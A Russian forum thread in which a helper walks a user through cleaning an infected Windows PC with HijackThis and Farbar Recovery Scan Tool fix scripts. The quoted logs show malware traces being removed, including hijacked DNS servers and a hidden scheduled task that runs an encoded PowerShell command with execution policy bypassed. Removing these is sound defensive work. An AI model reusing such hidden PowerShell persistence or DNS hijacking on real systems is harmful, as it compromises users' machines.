Хотелось бы проверить компьютер на наличие вирусов

@Zhbak · Регистрация: 15.06.2018

Студворк — интернет-сервис помощи студентам

В автозагрузке появилась программа Cjagent. И при загрузке не открывается realtek HD(приходится закрывать его и открывать через корневую папку на диске С,только после этого начинает работать)

@Zhbak · 16.06.2018, 12:26 **[ТС]**

В автозагрузке появилась программа Cjagent. И при загрузке не открывается realtek HD(приходится закрывать его и открывать через корневую папку на диске С,только после этого начинает работать)

@Sandor · 18.06.2018, 08:55

Здравствуйте!

Внимание! Рекомендации написаны специально для пользователя Zhbak. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
________________________________________ ______________

1. Пофиксите в HijackThis следующие строчки:

Code
O17 - HKLM\System\CCS\Services\Tcpip\..\{2e13bcd2-fd64-4c67-bb49-b0b32e04a6a8}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{2e13bcd2-fd64-4c67-bb49-b0b32e04a6a8}: [NameServer] = 82.163.143.176
O22 - Task: (disabled) {09040447-0479-0909-0B11-7D0E0A7F117F} - C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAIAAgADsAOwAgAC

2. Вручную перезагрузите компьютер и подготовьте новый CollectionLog.

@Zhbak · 20.06.2018, 00:07 **[ТС]**

Вот новый автолог

@Sandor · 20.06.2018, 08:42

Сообщение от Zhbak

В автозагрузке появилась программа Cjagent

Вы об этом?

Gaijin.Net Agent

Что еще из проблем осталось?

@Zhbak · 20.06.2018, 20:40 **[ТС]**

Нет,в автозагрузке именно "Cjagent", плюс есть "Adobe GC Invoker Utility",но это я как понимаю от Add block plus

@Sandor · 21.06.2018, 08:13

Пофиксите в HijackThis следующие строчки:

Code
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} [SuggestionsURL] = http://suggests.go.mail.ru/ie8?q={searchTerms} - Поиск@Mail.Ru
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} [URL] = http://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BC3476F53-48C3-4D17-90FC-2379F2CCA1D4%7D&gp=834428 - Поиск@Mail.Ru
O4 - HKCU\..\StartupApproved\Run: [Gaijin.Net Agent] (2018/06/12) = C:\Users\Сергей\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe  (file missing)
O21 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive1 - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive2 - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive3 - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive4 - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive5 - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive6 - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive7 - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive1 - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive2 - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive3 - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive4 - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive5 - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive6 - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:  OneDrive7 - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.

@Zhbak · 21.06.2018, 21:03 **[ТС]**

Cjagent исчез из автозагрузки

@Zhbak · 21.06.2018, 21:11 **[ТС]**

Но Realtek HD до сих пор после загрузки не открывается,приходится его закрывать через диспетчер,и только потом открывать из корневой папки

@Sandor · 22.06.2018, 08:35

Отключите до перезагрузки антивирус.

Выделите следующий код:

Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Start::
CreateRestorePoint:
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
CHR HomePage: Default -> inline.go.mail.ru
CHR NewTab: Default ->  Active:"chrome-extension://nnocenhcebpnchagbafojaflmekcfhfe/layout/newtab.html"
CHR DefaultSearchURL: Default -> hxxp://go-search.ru/search?q={searchTerms}
CHR DefaultSearchKeyword: Default -> gosearch
Task: {1422B623-E7EF-4D1F-8288-E6CFB3E8DA6F} - \B4BD7040-D94D-2F4F-40F8-882161D377A0 -> No File <==== ATTENTION
Task: {4EC091A8-83D0-42D3-BF98-E25A9508B428} - \{885E8557-A26C-C23A-576A-C8905516583F} -> No File <==== ATTENTION
AlternateDataStreams: C:\WINDOWS\system32\Drivers\qborqiqk.sys:changelist [1854]
AlternateDataStreams: C:\Users\Public\AppData:CSM [468]
FirewallRules: [{F00FEDEF-8ED1-4486-A1FB-0882024F7F39}] => (Allow) C:\Program Files (x86)\DriverPack Cloud\cloud.exe
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

@Zhbak · 24.06.2018, 12:55 **[ТС]**

Все сделал

@Sandor · 25.06.2018, 09:05

Сообщение от Zhbak

Realtek HD до сих пор после загрузки не открывается

Попробуйте переустановить драйвер вместе с программой.

Новые блоги и статьи Все статьи Все блоги /
Ритм жизни kumehtar 27.02.2026 Иногда приходится жить в ритме, где дел становится всё больше, а вовлечения в происходящее — всё меньше. Плотный график не даёт вниманию закрепиться ни на одном событии. Утро начинается с быстрых,. . .	SDL3 для Web (WebAssembly): Сборка библиотек SDL3 и Box2D из исходников с помощью CMake и Emscripten 8Observer8 27.02.2026 Недавно вышла версия SDL 3. 4. 2 библиотеки SDL3. На странице официальной релиза доступны исходники, готовые DLL (для x86, x64, arm64), а также библиотеки для разработки под Android, MinGW и Visual. . .	SDL3 для Web (WebAssembly): Реализация движения на Box2D v3 - трение и коллизии с повёрнутыми стенами 8Observer8 20.02.2026 Содержание блога Box2D позволяет легко создать главного героя, который не проходит сквозь стены и перемещается с заданным трением о препятствия, которые можно располагать под углом, как верхнее. . .	Конвертировать закладки radiotray-ng в m3u-плейлист damix 19.02.2026 Это можно сделать скриптом для PowerShell. Использование . \СonvertRadiotrayToM3U. ps1 <path_to_bookmarks. json> Рядом с файлом bookmarks. json появится файл bookmarks. m3u с результатом. # Check if. . .
Семь CDC на одном интерфейсе: 5 U[S]ARTов, 1 CAN и 1 SSI Eddy_Em 18.02.2026 Постепенно допиливаю свою "многоинтерфейсную плату". Выглядит вот так: https:/ / www. cyberforum. ru/ blog_attachment. php?attachmentid=11617&stc=1&d=1771445347 Основана на STM32F303RBT6. На борту пять. . .	Камера Toupcam IUA500KMA Eddy_Em 12.02.2026 Т. к. у всяких "хикроботов" слишком уж мелкий пиксель, для подсмотра в ESPriF они вообще плохо годятся: уже 14 величину можно рассмотреть еле-еле лишь на экспозициях под 3 секунды (а то и больше),. . .	И ясному Солнцу zbw 12.02.2026 И ясному Солнцу, и светлой Луне. В мире покоя нет и люди не могут жить в тишине. А жить им немного лет.	«Знание-Сила» zbw 12.02.2026 «Знание-Сила» «Время-Деньги» «Деньги -Пуля»

@Zhbak 0 / 0 / 0 Регистрация: 15.06.2018 Сообщений: 8

	Хотелось бы проверить компьютер на наличие вирусов 15.06.2018, 18:31. Показов 2563. Ответов 11 Метки нет (Все метки) В автозагрузке появилась программа Cjagent. И при загрузке не открывается realtek HD(приходится закрывать его и открывать через корневую папку на диске С,только после этого начинает работать) 0

@Sandor 22458 / 15912 / 3080 Регистрация: 08.10.2012 Сообщений: 64,825
	18.06.2018, 08:55
	Здравствуйте! Внимание! Рекомендации написаны специально для пользователя Zhbak. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе. Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи. ________________________________________ ______________ 1. Пофиксите в HijackThis следующие строчки: Code O17 - HKLM\System\CCS\Services\Tcpip\..\{2e13bcd2-fd64-4c67-bb49-b0b32e04a6a8}: [NameServer] = 82.163.142.178 O17 - HKLM\System\CCS\Services\Tcpip\..\{2e13bcd2-fd64-4c67-bb49-b0b32e04a6a8}: [NameServer] = 82.163.143.176 O22 - Task: (disabled) {09040447-0479-0909-0B11-7D0E0A7F117F} - C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAIAAgADsAOwAgAC 2. Вручную перезагрузите компьютер и подготовьте новый CollectionLog. 0

@Zhbak 0 / 0 / 0 Регистрация: 15.06.2018 Сообщений: 8
	20.06.2018, 20:40 [ТС]
	Нет,в автозагрузке именно "Cjagent", плюс есть "Adobe GC Invoker Utility",но это я как понимаю от Add block plus 0

@Zhbak 0 / 0 / 0 Регистрация: 15.06.2018 Сообщений: 8
	21.06.2018, 21:11 [ТС]
	Но Realtek HD до сих пор после загрузки не открывается,приходится его закрывать через диспетчер,и только потом открывать из корневой папки 0